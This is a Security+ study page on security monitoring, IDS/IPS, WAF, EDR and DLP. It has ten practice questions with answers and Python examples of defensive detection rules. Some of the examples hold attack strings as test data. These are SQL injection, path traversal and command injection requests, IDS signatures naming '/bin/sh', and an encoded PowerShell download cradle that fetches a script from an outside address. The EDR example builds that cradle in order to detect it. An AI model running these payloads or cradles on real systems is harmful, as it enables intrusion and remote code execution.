Security+ Domain 4 – Section B Review: Monitoring and Defense (10 Questions)

This section integrates:

  • Security Monitoring and Log Analysis
  • Firewalls, IDS, and IPS
  • Endpoint Detection and Response (EDR) and Data Loss Prevention (DLP)

Security+ expects you to understand how monitoring tools detect threats, how network defenses operate, and how endpoint and data protection complement each other.


1. Security Monitoring and Log Analysis

Monitoring provides visibility into what is happening across the environment:

  • SIEM (Security Information and Event Management) — aggregates, correlates, and analyzes logs from multiple sources.
  • Log sources — firewalls, servers, endpoints, applications, authentication systems.
  • Alerting — rules and thresholds that trigger notifications for suspicious activity.
  • Retention — logs must be stored long enough to support investigations and compliance.

If you are not monitoring, you are not detecting.
If you are not correlating, you are drowning in alerts.

Raw logs are data. Correlated logs are intelligence. SIEM turns data into actionable alerts.
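The correlation step is easiest to see on concrete log lines. The block below is an added example, not code from this study page: a SIEM-style rule that groups failed logins by source address and labels a source as password spraying (many accounts) or brute force (one account, many attempts) inside a sliding window. The log lines and their field layout are constructed for the example and do not mirror any particular product's format.

```python
"""Added example (not the study page's code): a SIEM-style correlation rule
over authentication logs. A source IP is labelled 'password_spraying' when
its failures hit many distinct accounts inside one window, or 'brute_force'
when many failures hit a single account. Log format is an assumption."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: "<ISO timestamp> <FAIL|OK> <user> <source IP>" per line.
SAMPLE_LOGS = """\
2024-05-01T09:00:01Z FAIL alice 203.0.113.7
2024-05-01T09:00:04Z FAIL bob 203.0.113.7
2024-05-01T09:00:09Z FAIL carol 203.0.113.7
2024-05-01T09:00:15Z FAIL dave 203.0.113.7
2024-05-01T09:00:20Z FAIL erin 203.0.113.7
2024-05-01T09:00:26Z FAIL frank 203.0.113.7
2024-05-01T09:01:02Z FAIL alice 198.51.100.9
2024-05-01T09:01:10Z FAIL alice 198.51.100.9
2024-05-01T09:01:17Z FAIL alice 198.51.100.9
2024-05-01T09:01:25Z FAIL alice 198.51.100.9
2024-05-01T09:01:33Z FAIL alice 198.51.100.9
2024-05-01T09:01:40Z OK alice 198.51.100.9
2024-05-01T09:05:00Z FAIL bob 192.0.2.44
2024-05-01T09:05:30Z FAIL bob 192.0.2.44
2024-05-01T09:30:00Z FAIL grace 203.0.113.7
"""


def parse(line):
    """Split one constructed log line into (timestamp, result, user, ip)."""
    ts, result, user, ip = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), result, user, ip


def classify_sources(log_text, window=timedelta(minutes=2), threshold=5):
    """Return {ip: label} for sources that cross the threshold inside any
    window of the given length. Sources below the threshold get no label."""
    failures = defaultdict(list)  # ip -> [(timestamp, user), ...]
    for line in log_text.splitlines():
        ts, result, user, ip = parse(line)
        if result == "FAIL":
            failures[ip].append((ts, user))

    labels = {}
    for ip, events in failures.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until the span fits the window.
            while events[end][0] - events[start][0] > window:
                start += 1
            in_window = events[start:end + 1]
            users = {u for _, u in in_window}
            if len(users) >= threshold:
                labels[ip] = "password_spraying"   # one source, many accounts
                break
            if len(in_window) >= threshold and len(users) == 1:
                labels[ip] = "brute_force"         # one source, one account
                break
    return labels


if __name__ == "__main__":
    for ip, label in classify_sources(SAMPLE_LOGS).items():
        print(f"{ip}: {label}")
```

The two thresholds are the tuning knobs from the text: raise them and the rule goes quiet (more false negatives); lower them and shared NAT addresses or a help-desk reset queue start tripping it (more false positives). Successful logins are deliberately ignored here; a separate rule would correlate a success that follows a spray from the same source.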


2. Firewalls, IDS, and IPS

Network defense tools operate at different points and in different modes:

  • Firewall — filters traffic based on rules (allow/deny by IP, port, protocol).
  • IDS (Intrusion Detection System) — monitors a copy of the traffic (from a SPAN port or network tap) and alerts on suspicious activity, but does not block it.
  • IPS (Intrusion Prevention System) — sits inline in the traffic path, so it can drop malicious packets as well as alert.
  • WAF (Web Application Firewall) — filters HTTP/HTTPS traffic at the application layer to protect web applications.

IDS detects and alerts. IPS detects and blocks.
A firewall filters by rule. An IPS filters by behavior and signature.

False positives (legitimate traffic flagged as malicious) and false negatives (malicious traffic not detected) are the key tuning challenges: tightening a rule trades one for the other, and because an IPS is inline, every false positive becomes an outage for legitimate traffic.
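To make the three layers and the IDS/IPS distinction concrete, here is an added example (not code from this page): a toy inspector with a first-match firewall rule set, a small content-signature engine that runs either as an IDS (alert only, packet passes) or as an IPS (alert and drop), and a scorer that counts true/false positives and negatives over a labelled traffic sample. The rules, signatures, packets and labels are all constructed for illustration; one signature is deliberately crude so that it misfires on benign traffic, the way real signatures do.

```python
"""Added example (not the study page's code): firewall 5-tuple rules, then
signature inspection in IDS or IPS mode, scored for false positives and
false negatives. All rules, signatures and packets are constructed."""
from dataclasses import dataclass
import ipaddress


@dataclass
class Packet:
    src: str
    dst: str
    dport: int
    proto: str
    payload: bytes = b""


# Firewall: (action, source network, dest port or None, proto or None).
# First matching rule wins; the last rule is the default deny.
FIREWALL_RULES = [
    ("allow", "0.0.0.0/0", 443, "tcp"),      # public HTTPS
    ("allow", "10.0.0.0/8", 22, "tcp"),      # SSH from inside only
    ("deny", "0.0.0.0/0", None, None),
]

# Signatures: (name, byte pattern), matched case-insensitively.
SIGNATURES = [
    ("sqli-union-select", b"UNION SELECT"),
    ("path-traversal", b"../../"),
    ("shell-exec", b"/bin/sh"),
]


def firewall_decision(pkt):
    """Rule-based filtering: address, port, protocol only. No payload look."""
    src = ipaddress.ip_address(pkt.src)
    for action, net, dport, proto in FIREWALL_RULES:
        if src not in ipaddress.ip_network(net):
            continue
        if dport is not None and pkt.dport != dport:
            continue
        if proto is not None and pkt.proto != proto:
            continue
        return action
    return "deny"


def inspect(pkt, mode="ids"):
    """Signature inspection. IDS mode never blocks; IPS mode drops on any hit.
    Returns (verdict, list of matched signature names)."""
    body = pkt.payload.upper()
    alerts = [name for name, pat in SIGNATURES if pat.upper() in body]
    if alerts and mode == "ips":
        return "drop", alerts
    return "pass", alerts


def process(pkt, mode="ids"):
    """Firewall first; only traffic the firewall allows reaches inspection."""
    if firewall_decision(pkt) == "deny":
        return "deny", []
    return inspect(pkt, mode)


# Constructed, labelled traffic: (packet, is it really malicious?)
SAMPLES = [
    (Packet("198.51.100.5", "10.1.1.10", 443, "tcp",
            b"GET /?id=1 UNION SELECT user,pass"), True),
    (Packet("198.51.100.6", "10.1.1.10", 443, "tcp",
            b"GET /docs/../../etc/passwd"), True),
    (Packet("198.51.100.7", "10.1.1.10", 443, "tcp",
            b"GET /update.bin?v=2"), False),              # the 'software update'
    (Packet("198.51.100.8", "10.1.1.10", 443, "tcp",
            b"POST /wiki body=How a union select works"), False),  # benign text -> FP
    (Packet("198.51.100.9", "10.1.1.10", 443, "tcp",
            b"GET /?cmd=;id"), True),                     # no signature covers it -> FN
    (Packet("203.0.113.4", "10.1.1.10", 22, "tcp", b"SSH-2.0"), False),  # firewall denies
]


def score(samples, mode="ids"):
    """Confusion counts for signature alerts on traffic the firewall admits."""
    counts = {"tp": 0, "fp": 0, "tn": 0, "fn": 0}
    for pkt, malicious in samples:
        verdict, alerts = process(pkt, mode)
        if verdict == "deny":
            continue  # never inspected, so not counted
        flagged = bool(alerts)
        key = ("t" if flagged == malicious else "f") + ("p" if flagged else "n")
        counts[key] += 1
    return counts


if __name__ == "__main__":
    print(score(SAMPLES))
```

The wiki packet is the false positive from Question 2 (benign content that happens to contain the pattern) and the `;id` packet is a false negative (an attack with no signature). In IDS mode the false positive costs an analyst a few minutes; in IPS mode the same rule drops a legitimate request, which is the partner-traffic problem in Question 8. The fix is the one that question gives: narrow the signature (for instance, match the SQL keywords only in the query string rather than anywhere in the body), not disable the device.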


3. Endpoint Detection and Data Loss Prevention

Protection at the endpoint and data level completes the defense strategy:

  • EDR — monitors endpoint behavior, detects threats, and enables response actions (isolation, remediation).
  • Antivirus/antimalware — primarily signature-based detection of known threats.
  • DLP — prevents unauthorized data transfers based on content inspection and policy.
  • Host-based firewall — filters traffic at the individual endpoint level.

EDR goes beyond traditional antivirus by analyzing behavior patterns rather than relying solely on signatures. DLP focuses on protecting data regardless of the threat type.


Section B Decision Pattern

When unsure in Domain 4 Section B:

  1. Determine if the scenario needs detection only (IDS) or detection and prevention (IPS).
  2. Use SIEM when log correlation and alerting are required.
  3. Apply DLP when the concern is data leaving the organization.
  4. Use EDR when endpoint-level threat detection and response are needed.
  5. Remember: WAF protects web applications; network firewalls protect network segments.

Section B – Practice Questions


Question 1

A security analyst reviews SIEM alerts and notices multiple failed login attempts from a single IP address across 15 different user accounts in a two-minute window. What type of attack does this suggest?

A. Brute force against a single account
B. Password spraying
C. Credential stuffing
D. Phishing

Answer & reasoning

Correct: B

Password spraying tries a small number of common passwords across many accounts, which is the pattern described: one source touching many accounts with only a few attempts each inside a short window. Brute force concentrates many attempts on a single account, and credential stuffing replays username/password pairs leaked from another breach. In real logs, stuffing from a single source can look similar at the account level; the distinguishing evidence is whether the same few passwords are tried against every account (spraying) or each account gets its own pair (stuffing), so check the attempted passwords or the per-account attempt count before naming the attack.


Question 2

An IDS generates an alert for traffic that is later confirmed to be a legitimate software update. What is this type of alert called?

A. True positive
B. False positive
C. True negative
D. False negative

Answer & reasoning

Correct: B

A false positive occurs when the system incorrectly identifies legitimate traffic as malicious. The IDS alerted on non-malicious activity. Tuning rules and updating signatures reduce false positives while maintaining detection accuracy.


Question 3

A company needs to prevent employees from uploading confidential documents to personal cloud storage services. Which technology is MOST appropriate?

A. IPS
B. SIEM
C. DLP
D. EDR

Answer & reasoning

Correct: C

Data Loss Prevention (DLP) inspects content and enforces policies that prevent unauthorized data transfers. DLP can identify confidential documents based on content patterns, classification labels, or fingerprinting and block uploads to unauthorized destinations.
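Section 3 and this answer both describe DLP as content inspection plus a policy decision. The block below is an added example, not code from this page or from any DLP product: it applies the three detection methods named above (a content pattern, a classification label, and a document fingerprint) to an outbound upload and blocks it when sensitive content is headed for a destination that is not on the approved list. The documents, labels, destinations and the card number (a standard test number) are constructed for the example.

```python
"""Added example (not the study page's code): a minimal DLP check for an
outbound upload. Detection by content pattern (card numbers validated with
the Luhn checksum), by classification label, and by fingerprint of a known
confidential document; the policy then allows or blocks by destination.
Documents, destinations and labels are constructed for illustration."""
import hashlib
import re

# Destinations the policy sanctions for sensitive content (constructed names).
APPROVED_DESTINATIONS = {"files.example-corp.internal", "sharepoint.example-corp.internal"}

# Labels a classification tool stamps into documents; matched case-sensitively
# so ordinary prose ("the confidential report") does not trip the rule.
LABEL_RE = re.compile(r"\b(CONFIDENTIAL|INTERNAL ONLY|RESTRICTED)\b")

# 13-16 digits, optionally separated by spaces or dashes.
CARD_RE = re.compile(r"\b(?:\d[ -]?){13,16}\b")


def luhn_ok(digits):
    """Luhn checksum: true for strings that can be real card numbers.
    Filters out invoice numbers and other digit runs the regex catches."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_card_numbers(text):
    """Return digit strings that look like card numbers and pass Luhn."""
    hits = []
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if 13 <= len(digits) <= 16 and luhn_ok(digits):
            hits.append(digits)
    return hits


def fingerprint(text):
    """Whitespace- and case-normalized SHA-256, so a re-saved copy still matches."""
    normalized = " ".join(text.lower().split())
    return hashlib.sha256(normalized.encode()).hexdigest()


# Constructed 'known confidential' corpus, registered by fingerprint only.
CONFIDENTIAL_DOCS = [
    "Project Falcon acquisition memo: target list, offer prices and board timeline.",
]
KNOWN_FINGERPRINTS = {fingerprint(d) for d in CONFIDENTIAL_DOCS}


def classify(text):
    """Return the list of reasons the content counts as sensitive."""
    reasons = []
    if fingerprint(text) in KNOWN_FINGERPRINTS:
        reasons.append("fingerprint-match")
    if LABEL_RE.search(text):
        reasons.append("classification-label")
    cards = find_card_numbers(text)
    if cards:
        reasons.append(f"pan:{len(cards)}")
    return reasons


def evaluate_upload(text, destination):
    """Policy decision: sensitive content may go only to approved destinations."""
    reasons = classify(text)
    if not reasons:
        return "allow", []
    if destination in APPROVED_DESTINATIONS:
        return "allow", reasons   # sensitive, but a sanctioned destination
    return "block", reasons


if __name__ == "__main__":
    print(evaluate_upload("Customer card 4111 1111 1111 1111 exp 12/27",
                          "drive.example-personal.com"))
```

Note what each method buys: the pattern catches data the organization never catalogued, the label relies on upstream classification having been applied, and the fingerprint catches a specific document even after reformatting but misses a paraphrase. A real deployment also has to see the content, which for an HTTPS upload means the DLP agent runs on the endpoint or the proxy terminates TLS.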


Question 4

An organization deploys an inline device that inspects all incoming traffic and automatically drops packets matching known attack signatures. What type of device is this?

A. IDS
B. Proxy server
C. SIEM
D. IPS

Answer & reasoning

Correct: D

An IPS operates inline and can actively block (drop) malicious traffic based on signatures and behavioral analysis. An IDS would only detect and alert, not drop packets. The key distinction is that IPS takes automated action to prevent attacks.


Question 5

A malware infection evades the company's signature-based antivirus. The security team deploys a tool that detects the malware by analyzing abnormal process behavior on the endpoint. What type of tool is this?

A. Network firewall
B. DLP agent
C. EDR solution
D. Vulnerability scanner

Answer & reasoning

Correct: C

EDR (Endpoint Detection and Response) uses behavioral analysis to detect threats that signature-based antivirus misses. EDR monitors process execution, file changes, network connections, and other endpoint behaviors to identify and respond to sophisticated threats.


Question 6

A web application is targeted by SQL injection attacks. The network firewall does not detect the attacks because they arrive over HTTPS on port 443. What additional control should be implemented?

A. Deploy a WAF
B. Close port 443
C. Increase IDS sensitivity
D. Add more firewall rules

Answer & reasoning

Correct: A

A Web Application Firewall (WAF) inspects HTTP/HTTPS requests at the application layer and can detect and block SQL injection, XSS, and other web-specific attacks. A network firewall decides on addresses, ports and protocols; port 443 has to stay open for the site to work, and the malicious request travels inside the TLS session where the firewall does not look. For the WAF to see the request it must terminate TLS itself or sit behind the load balancer or reverse proxy that does; placed in front of the TLS endpoint it sees only ciphertext. Closing port 443 would take the application offline, and more IDS sensitivity or more firewall rules still do not reach inside the request.


Question 7

A SIEM correlation rule triggers when it detects a user logging in from two geographically distant locations within 10 minutes. What type of detection is this?

A. Signature-based detection
B. Impossible travel detection
C. Heuristic scanning
D. Port scanning detection

Answer & reasoning

Correct: B

Impossible travel detection identifies when a user appears to log in from two locations that are too far apart to travel between in the elapsed time. It is a strong indicator of credential compromise: someone else is using the user's credentials from a different location. Before responding, rule out the common benign causes, since VPN egress points, mobile carrier address pools and coarse IP geolocation can all place one user in two cities within minutes.
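The rule in this question reduces to a distance and a speed. The block below is an added example, not code from this study page: it pairs each user's consecutive logins, computes the great-circle distance between the geolocated positions with the haversine formula, and flags any pair that would require travelling faster than a set ceiling. The login records and coordinates are constructed (city positions are approximate), and IP-to-location lookup is assumed to have happened upstream.

```python
"""Added example (not the study page's code): impossible-travel correlation
over a constructed list of geolocated logins. Geolocation of the source IP
is assumed to be done before these records are produced."""
import math
from collections import defaultdict
from datetime import datetime

EARTH_RADIUS_KM = 6371.0
MAX_SPEED_KMH = 900.0   # about airliner cruise speed; faster is implausible


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points given in decimal degrees."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


# Constructed login events: (user, ISO timestamp, place label, lat, lon).
LOGINS = [
    ("alice", "2024-05-01T09:00:00", "New York", 40.71, -74.01),
    ("alice", "2024-05-01T09:08:00", "London", 51.51, -0.13),
    ("bob", "2024-05-01T08:00:00", "Chicago", 41.88, -87.63),
    ("bob", "2024-05-01T11:30:00", "New York", 40.71, -74.01),
]


def impossible_travel(logins, max_speed_kmh=MAX_SPEED_KMH):
    """Return (user, from, to, distance_km, implied_speed_kmh) for each pair
    of consecutive logins by the same user that exceeds the speed ceiling."""
    by_user = defaultdict(list)
    for user, ts, place, lat, lon in logins:
        by_user[user].append((datetime.fromisoformat(ts), place, lat, lon))

    findings = []
    for user, events in by_user.items():
        events.sort()
        for (t1, p1, la1, lo1), (t2, p2, la2, lo2) in zip(events, events[1:]):
            dist = haversine_km(la1, lo1, la2, lo2)
            hours = (t2 - t1).total_seconds() / 3600
            if hours <= 0:
                # Same timestamp: any positive distance is impossible.
                speed = float("inf") if dist > 0 else 0.0
            else:
                speed = dist / hours
            if speed > max_speed_kmh:
                findings.append((user, p1, p2, round(dist), round(speed)))
    return findings


if __name__ == "__main__":
    for f in impossible_travel(LOGINS):
        print(f)
```

Alice's New York to London hop in eight minutes implies tens of thousands of km/h and is flagged; Bob's Chicago to New York in three and a half hours is a normal flight and is not. The speed ceiling is where the VPN caveat lives: an organization whose users egress through a few known VPN addresses should whitelist those egress locations rather than raise the ceiling until the rule stops firing.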


Question 8

An organization's IPS is blocking legitimate business partner traffic due to overly aggressive rules. What should the security team do?

A. Disable the IPS entirely
B. Switch the IPS to IDS mode
C. Whitelist all business partner IP addresses from all inspection
D. Tune the IPS rules to reduce false positives while maintaining protection

Answer & reasoning

Correct: D

Tuning IPS rules balances security and usability. Disabling or bypassing the IPS entirely removes protection. Switching to IDS mode removes prevention capability. Whitelisting all traffic from partner IPs creates a security gap. Rule tuning addresses the specific false positive while maintaining protection.


Question 9

A security analyst needs to investigate a security incident that occurred three months ago. The analyst discovers that firewall logs older than 30 days have been deleted. What control failure occurred?

A. Insufficient log retention
B. Misconfigured alerting
C. Missing encryption
D. Inadequate access controls

Answer & reasoning

Correct: A

Log retention policies must align with investigation and compliance requirements. A 30-day retention period is insufficient for investigating incidents discovered after that window. Retention periods should be based on regulatory requirements, industry standards, and organizational needs.


Question 10

An EDR solution detects suspicious PowerShell activity on a workstation and automatically isolates the machine from the network while alerting the security team. What capability does this demonstrate?

A. Vulnerability scanning
B. Log aggregation
C. Automated incident response
D. Patch management

Answer & reasoning

Correct: C

The EDR performed automated incident response by detecting the threat, taking a containment action (network isolation), and alerting the team. This combination of detection, automated response, and notification is a core EDR capability that reduces the time between detection and containment.
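Questions 5 and 10 both turn on the same idea: the EDR decides from behaviour (who spawned what, with which flags) rather than from a file signature, and then acts. The block below is an added example, not code from this page or from any EDR vendor: it evaluates a constructed stream of process-creation events against three behaviour rules, decodes a PowerShell `-EncodedCommand` argument so the rule can read what is inside it, and isolates the host once enough rules fire. The event records, rule names and the `isolate()` stand-in are invented for illustration.

```python
"""Added example (not the study page's code): behaviour-based endpoint
detection over constructed process-creation events, with an automated
isolation step. No file hash or signature is consulted; rules look only at
parent/child relationships and command lines. isolate() is a stand-in for
a real agent's network-containment action."""
import base64
from collections import defaultdict

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe"}
# Flags and cradle fragments that rarely appear in legitimate admin scripts.
SUSPICIOUS_TOKENS = ("downloadstring", "invoke-expression", "iex ", "-nop",
                     "-w hidden", "frombase64string")


def decode_encoded_command(cmdline):
    """PowerShell -EncodedCommand (or any unambiguous prefix such as -enc or -e)
    carries base64 of UTF-16LE script text. Return it lowercased, or ''."""
    parts = cmdline.split()
    for i, p in enumerate(parts[:-1]):
        if len(p) >= 2 and "-encodedcommand".startswith(p.lower()):
            try:
                return base64.b64decode(parts[i + 1]).decode("utf-16-le").lower()
            except (ValueError, UnicodeDecodeError):
                return ""
    return ""


def ps_encoded(script):
    """Build an -EncodedCommand argument the way an attacker's stager would."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed process-creation events from two hosts.
EVENTS = [
    {"host": "WS-0412", "image": "winword.exe", "parent": "explorer.exe",
     "cmdline": 'winword.exe /n "invoice.docm"'},
    {"host": "WS-0412", "image": "powershell.exe", "parent": "winword.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ps_encoded(
         "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')")},
    {"host": "WS-0777", "image": "powershell.exe", "parent": "services.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},   # scheduled admin job
]


def evaluate(event):
    """Return the names of the behaviour rules this event matches."""
    hits = []
    image, parent = event["image"].lower(), event["parent"].lower()
    if image in SCRIPT_HOSTS and parent in OFFICE_APPS:
        hits.append("office-spawns-script-host")
    decoded = decode_encoded_command(event["cmdline"])
    if decoded:
        hits.append("encoded-powershell")
    visible = event["cmdline"].lower() + " " + decoded
    if image in SCRIPT_HOSTS and any(tok in visible for tok in SUSPICIOUS_TOKENS):
        hits.append("suspicious-powershell-flags-or-cradle")
    return hits


def isolate(host):
    """Stand-in for network isolation: a real agent blocks all traffic except
    to its own management server so the analyst can still reach the host."""
    return f"isolated:{host}"


def respond(events, isolate_threshold=2):
    """Evaluate every event; isolate a host that accumulates enough rule hits,
    alert only on a single hit. Returns {host: (hits, action)}."""
    per_host = defaultdict(list)
    for ev in events:
        per_host[ev["host"]].extend(evaluate(ev))
    outcome = {}
    for host, hits in per_host.items():
        if len(hits) >= isolate_threshold:
            action = isolate(host)
        elif hits:
            action = "alert-only"
        else:
            action = "none"
        outcome[host] = (hits, action)
    return outcome


if __name__ == "__main__":
    for host, (hits, action) in respond(EVENTS).items():
        print(host, hits, action)
```

The backup job on WS-0777 is the case that keeps the threshold honest: PowerShell launched by the service control manager with a plain `-File` argument matches nothing, so it is neither alerted on nor isolated. The Word-spawned, hidden, encoded, downloading PowerShell on WS-0412 matches all three rules and is contained before anyone reads the alert, which is the detection-to-containment gap the answer above refers to.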
